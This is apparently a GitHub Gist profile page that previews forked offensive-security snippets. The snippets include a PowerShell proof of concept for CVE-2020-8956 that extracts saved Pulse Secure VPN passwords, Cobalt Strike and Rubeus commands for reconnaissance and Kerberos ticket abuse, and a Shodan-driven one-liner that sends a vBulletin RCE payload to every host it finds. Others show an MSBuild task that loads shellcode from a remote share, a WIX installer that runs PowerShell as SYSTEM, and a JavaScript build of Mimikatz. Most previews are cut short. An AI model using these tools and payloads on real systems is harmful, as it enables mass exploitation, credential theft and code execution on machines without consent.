unbaiat
unbaiat / CVE-2020-8956.ps1
Created Oct 29, 2020 — forked from QKaiser/CVE-2020-8956.ps1
CVE-2020-8956 - Powershell PoC
Add-Type -AssemblyName System.Security;
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
$ivename = $ive.PSPath.split('\')[-1].ToUpper()
Write-Host "[+] Checking IVE $($ivename)..."
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
# 3 possible value names for password
$encrypted = $ive.Password1
unbaiat / PowerView-3.0-tricks.ps1
Created Oct 15, 2020 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
unbaiat / cobaltstrike_sa.txt
Created Oct 15, 2020 — forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
unbaiat / gist:512f813eafda92406ae753890be43482
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
unbaiat / vBulletin RCE shodan
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
# This is not great...
unbaiat / msbuild_inline_task_parent_process_spoof.txt
<Project xmlns="">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
MyCode='<base64 encoded x64 shellcode>'
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
<UsingTask TaskName="SimpleTask" AssemblyFile="\\\share\IEShims.dll" />
unbaiat / msigen.wix
Created Jan 4, 2020 — forked from xpn/msigen.wix
WIX file with embedded Powershell, which will be executed as SYSTEM
<?xml version="1.0"?>
<Wix xmlns="">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
unbaiat / tasks.cs
Created Jan 4, 2020 — forked from xpn/tasks.cs
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
unbaiat / tz.js
Last active Dec 10, 2019 — forked from hardw00t/mimikatz.js
Mimikatz.exe in JS
var serialized_obj2 = [